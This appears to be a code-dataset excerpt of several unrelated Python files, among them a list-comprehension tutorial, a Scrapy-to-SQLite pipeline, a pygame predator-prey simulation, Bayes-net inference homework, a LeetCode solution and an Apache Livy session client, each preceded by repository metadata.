pos2 = moy
# Show the mask
# cv2.imshow('mask 2', mask)
# cv2.waitKey(0)
# Get the distance
#rows, col = mask.shape
#for i in xrange(col):
# k = mask.item(10, i)
# if k == 255:
# distance = ((1210000)/(((i*1.4)/1000)*1500-1575))/10
# Edge mask
# edge_mask = cv2.Canny(image,5, 100)
# cv2.imshow('edges', edge_mask)
# cv2.waitKey(0)
# mix both mask
# mix_mask = cv2.bitwise_and(edge_mask, mask)
# cv2.imshow('mixed mask', mix_mask)
# cv2.waitKey(0)
# find lines
#lines = cv2.HoughLinesP(mask, 1, np.pi/180, 5, minLineLength= 10, maxLineGap= 5)
#for x1,y1,x2,y2 in lines[0]:
# cv2.line(image,(x1,y1),(x2,y2),(0,255,0),2)
print str(pos)
cv2.circle(image, (pos2,1000), 10, (0, 255, 0), 3, cv2.CV_AA)
cv2.putText(image, str(distance) + 'cm', (pos2+15, 1000), cv2.FONT_HERSHEY_SIMPLEX, 4,(255,255,255),2, cv2.CV_AA)
# cv2.imwrite("Pos_300.jpg", image)
cv2.imshow('Lines 3', cv2.resize(image, (0, 0), fx=0.3, fy=0.3))
cv2.waitKey(0)
cv2.destroyAllWindows()
| true |
71a3935f00c2470a072926fa1f9e58c29ae524d5 | Python | manojmpg114/Python | /Python Statements/list_comprehensions.py | UTF-8 | 1,724 | 4.15625 | 4 | [] | no_license | mystring = "Hello"
mylist = []
# The classic way: loop over the string and append each character.
for letter in mystring:
    mylist.append(letter)
print(mylist)
# A list comprehension does the same build in a single expression.
mylist = [letter for letter in mystring]
print(mylist)
mylist = [x for x in 'word']  # the loop variable name is arbitrary, as long as it is used consistently
print(mylist)
mylist = [x for x in range(0,11)]
print(mylist)
mylist = [x**2 for x in range(0,11)]  # apply an operation (square) to each element of the range
print(mylist)
mylist = [x for x in range(0,11) if x%2 ==0]  # a trailing `if` filters which elements are kept
print(mylist)
celcius = [0, 10, 20, 34.5]
fahrenheit = [((9/5)*temp +32) for temp in celcius]  # comprehension form of the conversion loop below
print(fahrenheit)
# The equivalent "long way" with an explicit loop and append:
fahrenheit = []
for temp in celcius:
    fahrenheit.append(((9/5)*temp + 32))
print(fahrenheit)
results = [x if x%2 == 0 else 'ODD' for x in range(0,11)]
# Note: with if/else the conditional expression comes BEFORE the loop clause
# (unlike the filtering `if`, which comes after). If this reads poorly, a
# plain loop is the better choice.
print(results)
# Nested loops, classic form:
mylist = []
for x in [2,4,6]:
    for y in [100,200,300]:
        mylist.append(x*y)
print(mylist)
# Nested comprehension: clauses read left-to-right like the nested loops.
# NOTE(review): the inner operand here is [1,10,1000], not the [100,200,300]
# used by the loop above, so the two examples intentionally(?) differ -- confirm.
mylist = [x*y for x in [2,4,6] for y in [1,10,1000]]
print(mylist) | true |
2e7ea796e9ea60244e4e5e4e374a1be57a392c74 | Python | Reader6/WebRead | /Novelspider/Novels/Novelspider/Novelspider/pipelines.py | UTF-8 | 1,890 | 2.65625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# import json
# class NovelspiderPipeline(object):
# def __init__(self):
# self.f = open("novel.json", "w")
#
# def process_item(self, item, spider):
# content = json.dumps(dict(item),ensure_ascii=False) + ',\n'
# self.f.write(content)
# return item
#
# def close_spider(self,spider):
# self.f.close()
# 爬取到的数据写入到SQLite数据库
import sqlite3
class NovelspiderPipeline(object):
    """Scrapy item pipeline that persists scraped novel items into SQLite.

    Each spider writes to its own table; all tables share the same
    seven-column schema (name, author, img, type, des, date, start).
    """

    # Maps spider name -> destination table.
    TABLE_BY_SPIDER = {
        'xianxia': 'XIANXIA',
        'lishi': 'LISHI',
        'kehuan': 'KEHUAN',
        'wangyou': 'WANGYOU',
    }

    def open_spider(self, spider):
        """Open the SQLite database when the spider starts."""
        db_name = spider.settings.get('SQLITE_DB_NAME', 'novel_info.db')
        self.db_conn = sqlite3.connect(db_name)
        self.db_cur = self.db_conn.cursor()

    def close_spider(self, spider):
        """Commit pending inserts and close the connection on shutdown."""
        self.db_conn.commit()
        self.db_conn.close()

    def process_item(self, item, spider):
        """Persist one scraped item, then pass it down the pipeline."""
        self.insert_db(item, spider)
        return item

    def insert_db(self, item, spider):
        """Insert one item into the table associated with *spider*.

        Raises ValueError for an unrecognised spider name. (The original
        if/elif chain left ``sql`` unbound in that case, so the execute call
        crashed with an unhelpful NameError.)
        """
        values = (
            str(item['novel_name']),
            str(item['novel_author']),
            str(item['novel_img']),
            str(item['novel_type']),
            str(item['novel_des']),
            str(item['novel_date']),
            str(item['novel_start']),
        )
        try:
            table = self.TABLE_BY_SPIDER[spider.name]
        except KeyError:
            raise ValueError('no table configured for spider %r' % spider.name)
        # The table name comes from the trusted mapping above; the item
        # values are bound parameters, so no SQL injection is possible.
        self.db_cur.execute('INSERT INTO %s VALUES(?,?,?,?,?,?,?)' % table, values)
a02b6eeee7869206a4ded3c2fa2221dfefb6d084 | Python | aditshinde/python-training | /day-1-handson/armstrong.py | UTF-8 | 226 | 3.859375 | 4 | [
"Apache-2.0"
] | permissive | ## TODO: Do for all numbers.
def is_armstrong(num):
    """Return True if *num* is an Armstrong (narcissistic) number.

    A non-negative integer is Armstrong when the sum of its digits, each
    raised to the power of the digit count, equals the number itself,
    e.g. 153 = 1**3 + 5**3 + 3**3. Addresses the file's TODO by working
    for any non-negative integer, not just the hard-coded 153.
    """
    digits = str(num)
    power = len(digits)
    return num == sum(int(d) ** power for d in digits)


a = 153
if is_armstrong(a):
    print(a, " is Armstrong number")
else:
    print(a, " is not Armstrong number")
fd9ef283d4462106764aac750a7b7121f18308d6 | Python | AcisAce/My-Python-Projects | /Python Projects/Predprey/Beta.py | UTF-8 | 2,591 | 3.21875 | 3 | [] | no_license | #Author=AcisAce
import pygame
import math
import random
## Welcome to the predprey simulation program
(width,height)=(800,400) #Window properties
screen=pygame.display.set_mode((width,height)) #Display Settings
screen.fill((255,255,255))
sizePred=20 #Sizes in pixels
sizePrey=10
velPred=1
velPrey=0.01
colorRand=[(255,0,128),(0,255,200),(0,128,255)] #Three random colors
#------------------------------------------------------------------------------------Predator Initialization
class Predator(object):
    """A predator: a thick-outlined circle that drifts and bounces off walls."""

    def __init__(self, x, y, color):
        self.x = x
        self.y = y
        self.color = color
        # A random heading is stored for future use; current motion is
        # axis-aligned at the constant predator speed.
        self.angle = random.uniform(0, 2 * math.pi)
        self.velx = velPred
        self.vely = velPred

    def drawPred(self):
        pygame.draw.circle(screen, self.color, (self.x, self.y), sizePred, 4)

    def move(self):
        # Positions are kept as ints because pygame draws at pixel coordinates.
        self.x = int(self.x + self.velx)
        self.y = int(self.y + self.vely)

    def bounce(self):
        # Reflect the velocity component when the circle touches a window edge.
        if self.x <= sizePred or self.x >= width - sizePred:
            self.velx = -self.velx
        if self.y <= sizePred or self.y >= height - sizePred:
            self.vely = -self.vely

    def detect(self):
        # TODO: implement prey detection. BUGFIX note: the statements that
        # previously sat in this method were module-level predator setup that
        # had been mis-indented into it -- they never executed, which left
        # ``listPredators`` undefined where the drawing code uses it. They
        # now live below, at module scope.
        pass


# Module-level setup: spawn the predators at random positions (mirrors the
# prey-initialisation section further down).
predatorCount = 1  # Set Number of predators
listPredators = []
for i in range(predatorCount):
    xRand = random.randint(sizePred, width - sizePred)
    yRand = random.randint(sizePred, height - sizePred)
    colRand = random.choice(colorRand)
    listPredators.append(Predator(xRand, yRand, colRand))
#-------------------------------------------------------------------------------------Prey Initialization
class Prey(object):
    """A prey organism, rendered as a small thin-outlined circle."""

    def __init__(self, x, y, color):
        # Pixel position and outline colour of this prey.
        self.x, self.y, self.color = x, y, color

    def drawPrey(self):
        """Draw this prey onto the global screen surface."""
        pygame.draw.circle(screen, self.color, (self.x, self.y), sizePrey, 2)
# Spawn the prey population at random positions inside the window margins.
preyCount = 30  # size of the prey population
listPrey = []
for _ in range(preyCount):
    spawn_x = random.randint(sizePrey, width - sizePrey)
    spawn_y = random.randint(sizePrey, height - sizePrey)
    colP = (0, 0, 0)  # all prey are drawn in black
    listPrey.append(Prey(spawn_x, spawn_y, colP))
# Draw the initial frame once before entering the event loop.
for predator in listPredators:
    predator.drawPred()
for prey in listPrey:
    prey.drawPrey()

running = True
while running:  # Main Game Loop
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    screen.fill((255, 255, 255))
    for predator in listPredators:
        predator.bounce()
        predator.move()
        predator.drawPred()
    for prey in listPrey:
        prey.drawPrey()
    pygame.display.flip()
# BUGFIX: pygame.quit() used to be called inside the loop the moment a QUIT
# event arrived; the rest of that iteration then drew on a shut-down display,
# raising pygame.error. Quit exactly once, after the loop has fully exited.
pygame.quit()
| true |
81757e027c0c9e9a67b6f083754967a1900b8bfb | Python | luguannan/Artificial-Intelligence | /HW3/BayesNet.py | UTF-8 | 17,380 | 3.0625 | 3 | [] | no_license |
class ProbDist:
    """A discrete probability distribution over the values of one variable."""

    def __init__(self, varname, freqs=None):
        """Create a distribution; if *freqs* (value -> weight) is given,
        load and normalize it immediately."""
        self.prob = {}
        self.varname = varname
        self.values = []
        if freqs:
            for value, weight in freqs.items():
                self[value] = weight
            self.normalize()

    def __getitem__(self, val):
        """Return P(val); unseen values have probability 0."""
        return self.prob.get(val, 0)

    def __setitem__(self, val, p):
        """Set P(val) = p, remembering first-seen value order."""
        if val not in self.values:
            self.values.append(val)
        self.prob[val] = p

    def normalize(self):
        """Rescale the probabilities to sum to 1; return self for chaining."""
        total = sum(self.prob.values())
        if total != 1:
            for val in self.prob:
                self.prob[val] /= total
        return self

    def show_approx(self, numfmt='%.2g'):
        """Show the probabilities rounded and sorted by key, for the
        sake of portable doctests."""
        return ', '.join([('%s: ' + numfmt) % (v, p)
                          for (v, p) in sorted(self.prob.items())])

    def __repr__(self):
        return "P(%s)" % self.varname
# ______________________________________________________________________________
class BayesNet:
    """An influence diagram: chance, decision and utility nodes."""

    def __init__(self, node_specs=None):
        """Build a net; *node_specs* must be ordered parents-before-children.

        The default was a mutable ``[]``; it is now ``None`` to avoid the
        shared-mutable-default pitfall (behavior for callers is unchanged).
        """
        self.nodes = []
        self.chance_vars = []
        self.decision_vars = []
        self.utility_vars = []
        self.variables = []
        for node_spec in (node_specs or []):
            self.add(node_spec)

    def add(self, node_spec):
        """Add a node built from *node_spec*; all its parents must exist."""
        node = BayesNode(*node_spec)
        assert node.variable not in self.variables
        assert all((parent in self.variables) for parent in node.parents)
        self.nodes.append(node)
        if node.kind == 'chance':
            self.chance_vars.append(node.variable)
            self.variables.append(node.variable)
        elif node.kind == 'decision':
            self.decision_vars.append(node.variable)
            self.variables.append(node.variable)
        elif node.kind == 'utility':
            # Utility nodes are not queryable variables of the network.
            self.utility_vars.append(node.variable)
        for parent in node.parents:
            self.variable_node(parent).children.append(node)

    def variable_node(self, var):
        """Return the node whose variable name is *var* (raises if absent)."""
        for n in self.nodes:
            if n.variable == var:
                return n
        raise Exception("Don't have that variable: %s" % var)

    def variable_values(self, var):
        """Every variable in this network is boolean."""
        return [True, False]

    def __repr__(self):
        return 'BayesNet(%r)' % self.nodes
# ______________________________________________________________________________
class BayesNode:
    """One node of a BayesNet: a chance, decision, or utility variable."""

    def __init__(self, kind, X, parents, cpt):
        # A whitespace-separated string of parent names is also accepted;
        # this parsing is common to all three node kinds.
        if isinstance(parents, str):
            parents = parents.split()
        if kind == 'chance':
            # CPT shorthands: a bare number means "no parents"; a
            # {bool: p} dict means "exactly one parent".
            if isinstance(cpt, (float, int)):
                cpt = {(): cpt}
            elif isinstance(cpt, dict):
                if cpt and isinstance(list(cpt.keys())[0], bool):
                    cpt = {(v,): p for v, p in cpt.items()}
            assert isinstance(cpt, dict)
            for vs, p in cpt.items():
                assert isinstance(vs, tuple) and len(vs) == len(parents)
                assert all(isinstance(v, bool) for v in vs)
                assert 0 <= p <= 1
            self.kind = 'chance'
            self.variable = X
            self.parents = parents
            self.cpt = cpt
            self.children = []
        elif kind == 'decision':
            # Decision nodes carry no table; inference clamps them later.
            self.kind = 'decision'
            self.variable = X
            self.parents = parents
            self.children = []
        elif kind == 'utility':
            # Utility tables map parent-value tuples to arbitrary payoffs,
            # so no [0, 1] bound is enforced here.
            if isinstance(cpt, dict):
                if cpt and isinstance(list(cpt.keys())[0], bool):
                    cpt = {(v,): p for v, p in cpt.items()}
            assert isinstance(cpt, dict)
            for vs, p in cpt.items():
                assert isinstance(vs, tuple) and len(vs) == len(parents)
                assert all(isinstance(v, bool) for v in vs)
            self.kind = 'utility'
            self.variable = X
            self.parents = parents
            self.cpt = cpt
            self.children = []

    def p(self, value, event):
        """P(variable == value | parents as assigned in *event*)."""
        assert isinstance(value, bool)
        ptrue = self.cpt[event_values(event, self.parents)]
        return ptrue if value is True else 1 - ptrue

    def __repr__(self):
        return repr((self.variable, ' '.join(self.parents)))
# ______________________________________________________________________________
def enumeration_ask(X, e, bn):
    """Return P(X | e) in network *bn*, computed by full enumeration."""
    assert X not in e, "Query variable must be distinct from evidence"
    dist = ProbDist(X)
    for value in bn.variable_values(X):
        dist[value] = enumerate_all(bn.variables, extend(e, X, value), bn)
    return dist.normalize()
def enumerate_all(variables, e, bn):
    """Sum of the joint probability over all unassigned *variables*, given *e*."""
    if not variables:
        return 1.0
    first, rest = variables[0], variables[1:]
    node = bn.variable_node(first)
    if first in e:
        # Observed: take its probability and recurse on the remainder.
        return node.p(e[first], e) * enumerate_all(rest, e, bn)
    # Hidden: marginalize over both truth values.
    return sum(node.p(val, e) * enumerate_all(rest, extend(e, first, val), bn)
               for val in bn.variable_values(first))
# ______________________________________________________________________________
class Factor:
    """A factor for variable elimination: a list of variables plus a table
    mapping each truth-value tuple (in ``self.variables`` order) to a number."""

    def __init__(self, variables, cpt):
        self.variables = variables
        self.cpt = cpt

    def pointwise_product(self, other, bn):
        "Combine two factors into one over the union of their variables."
        variables = list(set(self.variables) | set(other.variables))
        cpt = {event_values(e, variables): self.p(e) * other.p(e)
               for e in all_events(variables, bn, {})}
        return Factor(variables, cpt)

    def sum_out(self, var, bn):
        "Marginalize *var* out of this factor by summing over its values."
        variables = [X for X in self.variables if X != var]
        cpt = {event_values(e, variables): sum(self.p(extend(e, var, val))
                                               for val in bn.variable_values(var))
               for e in all_events(variables, bn, {})}
        return Factor(variables, cpt)

    def normalize(self):
        "Return my probabilities as a ProbDist keyed by value tuples."
        # NOTE(review): the stock implementation requires exactly one
        # remaining variable (see the disabled assert); this variant
        # deliberately keeps the full variable list so that multi-variable
        # joint queries work -- the resulting ProbDist's varname is a list.
        #assert len(self.variables) == 1
        return ProbDist(self.variables,
                        {k: v for k, v in self.cpt.items()})

    def p(self, e):
        "Look up my value tabulated for e."
        return self.cpt[event_values(e, self.variables)]
def elimination_ask(X, e, bn):
    """Compute P(X | e) in *bn* by variable elimination.

    *X* is a list of query variables and *e* a {var: bool} evidence dict.
    Returns a ProbDist keyed by tuples of truth values, one per query var.

    NOTE(review): this function MUTATES *bn* -- every decision variable
    mentioned in the evidence has its CPT overwritten with a deterministic
    {(): 1} / {(): 0} table, so decision nodes behave as clamped chance
    nodes. Subsequent calls re-clamp as needed, but the network never
    returns to its original state.
    """
    for x in X:
        assert x not in e
    for ed in e:
        if ed in bn.decision_vars:
            node = bn.variable_node(ed)
            if e[ed] is True:
                node.cpt = {(): 1}
            else:
                node.cpt = {(): 0}
    factors = []
    # Walk the variables in reverse topological order, summing out each one
    # that is neither queried nor observed.
    for var in reversed(bn.variables):
        factors.append(make_factor(var, e, bn))
        if is_hidden(var, X, e):
            factors = sum_out(var, factors, bn)
    return pointwise_product(factors, bn).normalize()
def adjust_seq(a, b):
    """For each name in *a* (in order), collect every index where it occurs in *b*."""
    return [idx for name in a for idx, other in enumerate(b) if name == other]
def elimination_ask_utility(e, bn):
    """Expected utility of the evidence/decision assignment *e* in *bn*.

    EU(e) = sum over assignments y of the utility node's still-free parents
    of P(y | e) * U(parents), where U is the utility node's table.
    """
    utility_node = bn.variable_node('utility')
    # Split the utility node's parents into those still free (tmp) and
    # those already fixed by the evidence (tmp2).
    tmp = [val for val in utility_node.parents if val not in e]
    tmp2 = [val for val in utility_node.parents if val in e]
    Prob = elimination_ask(tmp, e, bn)
    # NOTE(review): `sum` shadows the builtin inside this function.
    sum = 0
    # Build the utility-table key in the parents' declared order: fill the
    # evidence-fixed slots once, then overwrite the free slots for each
    # enumerated outcome y of the joint distribution.
    list_temp = [True] * len(utility_node.parents)
    for x in tmp2:
        for i in range(len(utility_node.parents)):
            if utility_node.parents[i] == x:
                list_temp[i] = e[x]
    for y in Prob.prob:
        for i in range(len(Prob.varname)):
            for j in range(len(utility_node.parents)):
                if Prob.varname[i] == utility_node.parents[j]:
                    list_temp[j] = y[i]
        t = tuple(list_temp)
        sum += Prob.prob[y] * utility_node.cpt[t]
    return sum
def elimination_ask_max_utility(X, e, bn):
    """MEU query: pick truth values for the decision variables *X* (given
    evidence *e*) that maximize expected utility.

    Returns a string of '+'/'-' signs for the chosen decisions followed by
    the rounded maximum expected utility.
    """
    e_max = {}
    # NOTE(review): `max` shadows the builtin; -10000000 stands in for -inf.
    max = -10000000
    # Enumerate every assignment of the decision variables and keep the best.
    for e1 in all_events(X, bn, e):
        value = elimination_ask_utility(e1, bn)
        if value > max:
            e_max = e1
            max = value
    result = []
    # NOTE(review): the iteration order of dict `e_max` determines the order
    # of the emitted signs; on Python 2 that order is arbitrary, not the
    # order the decision variables appeared in the query -- verify against
    # the expected output format.
    for x in e_max:
        if x in e:
            pass
        elif e_max[x] == True:
            result.append('+')
        elif e_max[x] == False:
            result.append('-')
        else:
            print 'Something wrong'
    result.append(str(int(round(max))))
    return ' '.join(result)
def elimination_ask_kinds(q, bn):
    """Dispatch a parsed Query to the matching inference routine and format
    its answer as a string ('P' -> probability, 'EU' -> expected utility,
    'MEU' -> best decision plus utility). Unknown types return None."""
    if q.type == 'P':
        dist = elimination_ask(q.X, q.e, bn)
        # Reorder the query's truth assignment to match the factor's
        # variable order before looking the probability up.
        key = tuple(q.value[i] for i in adjust_seq(dist.varname, q.X))
        return '%.2f' % dist[key]
    if q.type == 'EU':
        return str(int(round(elimination_ask_utility(q.e, bn))))
    if q.type == 'MEU':
        return elimination_ask_max_utility(q.X, q.e, bn)
def is_hidden(var, X, e):
    """True when *var* is neither a query variable nor fixed by the evidence."""
    return not (var in X or var in e)
def make_factor(var, e, bn):
    """Build the factor for *var* in bn's joint distribution projected onto *e*.

    The full joint distribution, restricted to agree with the evidence, is
    the pointwise product of these per-variable factors.
    """
    node = bn.variable_node(var)
    free_vars = [v for v in [var] + node.parents if v not in e]
    table = {}
    for event in all_events(free_vars, bn, e):
        table[event_values(event, free_vars)] = node.p(event[var], event)
    return Factor(free_vars, table)
def pointwise_product(factors, bn):
    """Fold a list of factors into one by repeated pointwise multiplication.

    Uses ``functools.reduce`` (available on Python 2.6+ and 3.x) instead of
    the bare ``reduce`` builtin, which no longer exists on Python 3.
    """
    from functools import reduce
    return reduce(lambda f, g: f.pointwise_product(g, bn), factors)
def sum_out(var, factors, bn):
    """Eliminate *var*: multiply together every factor mentioning it, sum the
    variable out of the product, and return the new factor list."""
    keep = [f for f in factors if var not in f.variables]
    involved = [f for f in factors if var in f.variables]
    keep.append(pointwise_product(involved, bn).sum_out(var, bn))
    return keep
def event_values(event, variables):
    """Project *event* onto *variables* as a tuple of values.

    A tuple of exactly the right length is assumed pre-ordered and returned
    unchanged; otherwise *event* is treated as a mapping.
    """
    if isinstance(event, tuple) and len(event) == len(variables):
        return event
    return tuple(event[var] for var in variables)
def extend(s, var, val):
    """Return a copy of substitution *s* with *var* additionally bound to *val*."""
    extended = dict(s)
    extended[var] = val
    return extended
def all_events(variables, bn, e):
    """Yield every extension of *e* that assigns a value to each of *variables*."""
    if not variables:
        yield e
        return
    first, rest = variables[0], variables[1:]
    for partial in all_events(rest, bn, e):
        for value in bn.variable_values(first):
            yield extend(partial, first, value)
# ______________________________________________________________________________
class Query():
    """A parsed input query: its kind ('P' / 'EU' / 'MEU'), query variables,
    their requested truth values, and the evidence assignment."""

    def __init__(self, type, X, value, e):
        # `type` shadows the builtin, but the parameter name is kept for
        # compatibility with the file's parser.
        self.type, self.X, self.value, self.e = type, X, value, e
def readfile():
    """Parse 'input.txt' into (queries, node_specs).

    Layout of the file: one or more query lines (P/EU/MEU syntax such as
    ``P(A = +, B = - | C = +)``), a ``******`` separator, then network node
    blocks separated by ``***`` lines. Returns a list of Query objects and a
    list of ('chance'|'decision'|'utility', name, parents, cpt) tuples
    suitable for BayesNet.

    NOTE(review): the query parser compares tokens with ``is`` / ``is not``
    (e.g. ``items[index] is '+'``). That is identity, not equality -- it only
    works because CPython interns these one-character literals, and newer
    Pythons emit a SyntaxWarning for it.
    """
    Querys = []
    BayesNet = []
    with open('input.txt', 'r') as infile:
        lines = infile.readlines()
        for i in xrange(len(lines)):
            lines[i] = lines[i].strip('\n')
        line_num = 0
        # --- Phase 1: query lines, until the '******' separator ------------
        while lines[line_num] != '******':
            X = []
            value = []
            e = {}
            if lines[line_num][0] == 'P':
                # Tokens come in (name, '=', sign) triples, optionally
                # followed by '|' and evidence triples.
                items = lines[line_num][1:].strip('\n').strip('(').strip(')').split(' ')
                for i in range(len(items)):
                    items[i] = items[i].strip(',')
                index = 0
                while index < len(items) and items[index] is not '|':
                    X.append(items[index])
                    if items[index + 2] is '+':
                        value.append(True)
                    elif items[index + 2] is '-':
                        value.append(False)
                    else:
                        print 'input wrong'
                    index += 3
                if index < len(items) and items[index] is '|':
                    index += 1
                    while index < len(items):
                        if items[index + 2] == '+':
                            e[items[index]] = True
                        elif items[index + 2] == '-':
                            e[items[index]] = False
                        else:
                            print 'input wrong'
                        index += 3
                Querys.append(Query('P',X,value,e))
            elif lines[line_num][0:2] == 'EU':
                # For EU queries the pre-'|' assignments go straight into
                # the evidence dict (the utility is conditioned on them).
                items = lines[line_num][2:].strip('\n').strip('(').strip(')').split(' ')
                for i in range(len(items)):
                    items[i] = items[i].strip(',')
                index = 0
                while index < len(items) and items[index] is not '|':
                    if items[index + 2] is '+':
                        e[items[index]] = True
                        value.append(True)
                    elif items[index + 2] is '-':
                        e[items[index]] = False
                    else:
                        print 'input wrong'
                    index += 3
                if index < len(items) and items[index] is '|':
                    index += 1
                    while index < len(items):
                        if items[index + 2] == '+':
                            e[items[index]] = True
                        elif items[index + 2] == '-':
                            e[items[index]] = False
                        else:
                            print 'input wrong'
                        index += 3
                Querys.append(Query('EU', X, value, e))
            elif lines[line_num][0:3] == 'MEU':
                # MEU lists bare decision-variable names before '|'.
                items = lines[line_num][3:].strip('\n').strip('(').strip(')').split(' ')
                for i in range(len(items)):
                    items[i] = items[i].strip(',')
                index = 0
                while index < len(items) and items[index] is not '|':
                    X.append(items[index])
                    index += 1
                if index < len(items) and items[index] is '|':
                    index += 1
                    while index < len(items):
                        if items[index + 2] == '+':
                            e[items[index]] = True
                        elif items[index + 2] == '-':
                            e[items[index]] = False
                        else:
                            print 'input wrong'
                        index += 3
                Querys.append(Query('MEU', X, value, e))
            line_num += 1
        # --- Phase 2: node blocks; the loop continues for as long as the
        # current line is a '***' / '******' separator (each parsed block
        # below leaves line_num sitting on the next separator). -------------
        while line_num < len(lines) and (lines[line_num] == '***' or lines[line_num] == '******'):
            line_num += 1
            X = ''
            parents = ''
            cpt = {}
            items = lines[line_num].split(' ')
            if items[0] == 'utility':
                # Header "utility | P1 P2 ...", then one CPT row per line:
                # "<value> <sign> <sign> ..." until the next separator.
                X = items[0]
                parents = ' '.join(items[2:])
                line_num += 1
                while line_num < len(lines) and lines[line_num] != '***' and lines[line_num] != '******':
                    prob_tab = lines[line_num].split(' ')
                    list_temp = []
                    for i in range(1, len(prob_tab)):
                        if prob_tab[i] == '+':
                            list_temp.append(True)
                        elif prob_tab[i] == '-':
                            list_temp.append(False)
                        else:
                            print 'input wrong'
                    t1 = ()
                    t1 = tuple(list_temp)
                    cpt[t1] = float(prob_tab[0])
                    line_num += 1
                BayesNet.append(('utility', X, parents, cpt))
            elif len(items) == 1:
                # A bare name: either a decision node (next line 'decision')
                # or a parentless chance node (next line is its prior).
                X = items[0]
                parents = ''
                if lines[line_num + 1] == 'decision':
                    BayesNet.append(('decision', X, parents, cpt))
                else:
                    cpt = {(): float(lines[line_num + 1])}
                    BayesNet.append(('chance', X, parents, cpt))
                line_num += 2
            else:
                # Chance node with parents: "Name | P1 P2 ..." plus CPT rows.
                X = items[0]
                parents = ' '.join(items[2:])
                line_num += 1
                while line_num < len(lines) and lines[line_num] != '***' and lines[line_num] != '******':
                    prob_tab = lines[line_num].split(' ')
                    list_temp = []
                    for i in range(1, len(prob_tab)):
                        if prob_tab[i] == '+':
                            list_temp.append(True)
                        elif prob_tab[i] == '-':
                            list_temp.append(False)
                        else:
                            print 'input wrong'
                    t1 = ()
                    t1 = tuple(list_temp)
                    cpt[t1] = float(prob_tab[0])
                    line_num += 1
                BayesNet.append(('chance', X, parents, cpt))
    return Querys, BayesNet
# ______________________________________________________________________________
def main():
    """Read queries and network from input.txt, answer each query, and
    write the answers (one per line) to output.txt."""
    qs , bn = readfile()
    bayesnet = BayesNet(bn)
    output = []
    for q in qs:
        output.append(elimination_ask_kinds(q, bayesnet))
    # NOTE(review): writing a str to a file opened in 'wb' only works on
    # Python 2 (this file is Python 2 throughout); under Python 3 the mode
    # would have to be 'w'.
    with open('output.txt', 'wb') as outfile:
        outfile.write('\n'.join(output))
# Run only when executed as a script, not on import.
if __name__ == "__main__":
    main()
| true |
5e6191c36648e965461581c30ea7797b20ad6c9a | Python | RishikaMachina/DP-3 | /Problem_2.py | UTF-8 | 704 | 3.015625 | 3 | [] | no_license | # Runs on Leetcode
# Runtime - O(m*n)
# Space - O(n) where m is # of rows and n is # of cols
class Solution:
    """LeetCode 931 -- Minimum Falling Path Sum. Bottom-up DP in O(m*n) time
    with O(n) extra space (one rolling row)."""

    def minFallingPathSum(self, A: List[List[int]]) -> int:
        """Return the minimum sum of a falling path through matrix *A*.

        A falling path starts in any column of the first row and steps to
        the same or an adjacent column in each following row. Returns 0 for
        an empty matrix. The input matrix is left unmodified (the original
        code aliased ``A[0]`` as the DP row and mutated the caller's data),
        and single-column matrices no longer crash on an out-of-range index.
        """
        if not A:
            return 0
        rows = len(A)
        cols = len(A[0])
        # Copy the first row so the in-place DP updates below cannot leak
        # into the caller's matrix.
        dp = A[0][:]
        for i in range(1, rows):
            pre = dp[:]  # best path sums ending in the previous row
            for j in range(cols):
                dp[j] = A[i][j]
                if cols == 1:
                    # Only one column: the path can only come from directly
                    # above (the old code indexed pre[j+1] and crashed here).
                    dp[j] += pre[j]
                elif j == 0:
                    dp[j] += min(pre[j], pre[j + 1])
                elif j == cols - 1:
                    dp[j] += min(pre[j - 1], pre[j])
                else:
                    dp[j] += min(min(pre[j - 1], pre[j]), pre[j + 1])
        return min(dp)
| true |
2728ce51d2d13b84df90c05fd282b8035cfd9767 | Python | seungwookim/LivyClientPython | /livy_hive_client.py | UTF-8 | 9,413 | 2.515625 | 3 | [] | no_license | import json, requests, textwrap, time, random
# json object hooker class
class JsonObject:
    """``object_hook`` for ``json.loads``: exposes each key of a decoded
    JSON object as an instance attribute (``obj.state`` etc.)."""

    def __init__(self, d):
        # Rebinding (not copying) keeps the hook cheap: the decoded dict
        # itself becomes this instance's attribute namespace.
        self.__dict__ = d
#json_data = json.loads(data, object_hook=JsonObject)
#requests.get('http://httpbin.org', hooks=dict(response=print_url))
#list(filter(lambda x:x=='idle' ,self.alive_sess_obj))
class LivyHiveClientManager:
def __init__(self, s_num):
self.max_sess_num = s_num
self.host = "http://481bf68ee6d9:8998"
self.hdfs_path = "/home/dev/hadoop"
self.headers = {'Content-Type': 'application/json'}
self.alive_sess_obj = None
self.alive_sess_cnt = None
self.alive_sess_list = []
self.alive_sess_state = []
self.avail_sess_list = []
def create_session(self):
"""
create session, get session id form return, run long code with that session
:return:
"""
self.check_alive_sessions()
if(self.max_sess_num < self.alive_sess_cnt):
print("exceed max session number")
return False
data = {'kind': 'pyspark',
"name": "tensormsa",
"executorCores": 1,
"executorMemory": "512m",
"driverCores": 1,
"driverMemory": "512m"}
r = requests.post(self.host + "/sessions", data=json.dumps(data), headers=self.headers)
return r.json()['id']
def check_alive_sessions(self):
"""
check alive sessions info
:return:
"""
self.alive_sess_list[:] = []
self.alive_sess_cnt = 0
self.alive_sess_obj = None
resp = requests.get(self.host + "/sessions/" , headers=self.headers)
self.alive_sess_obj = json.loads(resp.content, object_hook=JsonObject)
self.alive_sess_cnt = len(self.alive_sess_obj.sessions)
if(self.alive_sess_cnt > 0):
for i in range(0 , self.alive_sess_cnt):
self.alive_sess_list.append(self.alive_sess_obj.sessions[i].id)
def get_available_sess_id(self):
"""
get random one available (state is idle) session
:return:
"""
self.avail_sess_list[:] = []
resp = requests.get(self.host + "/sessions/" , headers=self.headers)
self.alive_sess_obj = json.loads(resp.content, object_hook=JsonObject)
self.alive_sess_cnt = len(self.alive_sess_obj.sessions)
if(self.alive_sess_cnt > 0):
for i in range(0 , self.alive_sess_cnt):
if(self.alive_sess_obj.sessions[i].state == 'idle'):
self.avail_sess_list.append(self.alive_sess_obj.sessions[i].id)
print("list of available sessions : {0} " .format(self.avail_sess_list))
def delete_all_sessions(self):
"""
delete all sessions
:return:
"""
print(self.alive_sess_list)
for sess_id in self.alive_sess_list:
print(sess_id)
r = requests.delete(self.host + "/sessions/" + str(sess_id), headers=self.headers)
print(r.json())
def print_all(self):
"""
delete all sessions
:return:
"""
print("host : {0}".format(self.host))
print("headers : {0}".format(self.headers))
print("alive_sess_obj : {0}".format(self.alive_sess_obj))
